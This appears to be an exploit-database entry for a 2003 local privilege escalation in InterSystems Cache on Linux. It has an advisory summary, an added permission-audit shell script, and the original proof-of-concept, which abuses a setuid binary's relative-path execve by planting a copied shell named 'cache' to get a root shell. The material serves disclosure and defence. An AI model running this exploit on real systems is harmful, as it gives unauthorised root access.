Vendor: Cache
By: kokaninATdtors
CVSS: 7.2 (HIGH)
Insecure Default Permissions
CWE: 264
Product Name: Cache
Affected Version From: 5.0.2.607.1
Affected Version To: 5.0.2.607.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2003

Insecure Default Permissions in InterSystems Cache

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. An strace of the cuxs binary shows: execve("../bin/cache", ["cache"], [/* 19 vars */]). cuxs is setuid (+s), yet it executes a path that is resolved relative to the caller's current working directory. A proof-of-concept exploit is provided which creates a directory called crapche/bin, copies the ash shell into it under the name cache, and then runs the cuxs binary from that directory.

Mitigation:

Ensure that all files and directories have appropriate permissions set.
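
One way to carry out this check, as an added example that is not part of the original advisory or any vendor tooling: a POSIX shell audit that lists world-writable paths, setuid/setgid files, and setuid/setgid files that sit in a world-writable directory without the sticky bit. The function names and the install path argument are assumptions.

```sh
#!/bin/sh
# Added example: permission audit for an installation tree. The path is
# supplied by the caller; nothing here assumes a particular product layout.

# Files and directories writable by "other". Symlinks are skipped because
# their own mode bits are not enforced.
world_writable() {
    find "$1" ! -type l -perm -0002 -print 2>/dev/null
}

# Regular files with the setuid or setgid bit.
setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Setuid/setgid files whose parent directory is world-writable without the
# sticky bit: any local user can rename or replace the privileged file.
replaceable_setid() {
    setid_files "$1" | while IFS= read -r f; do
        parent=$(dirname "$f")
        hit=$(find "$parent" -prune -perm -0002 ! -perm -1000 -print 2>/dev/null || true)
        if [ -n "$hit" ]; then printf '%s\n' "$f"; fi
    done
}

# Print labelled findings; return 0 when the tree is clean, 1 otherwise.
audit_tree() {
    ww=$(world_writable "$1" | sed 's/^/WORLD-WRITABLE /')
    sid=$(setid_files "$1" | sed 's/^/SETID /')
    rep=$(replaceable_setid "$1" | sed 's/^/REPLACEABLE-SETID /')
    for block in "$ww" "$sid" "$rep"; do
        if [ -n "$block" ]; then printf '%s\n' "$block"; fi
    done
    [ -z "$ww$sid$rep" ]
}

# Stand-alone use: ./audit.sh /path/to/install
if [ "$#" -gt 0 ]; then
    audit_tree "$1"
fi
```

A clean tree prints nothing and returns 0. This audit covers file and directory modes only; the relative-path execve in a setuid binary is a separate code-level defect that permissions alone do not remove.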

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8070/info

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET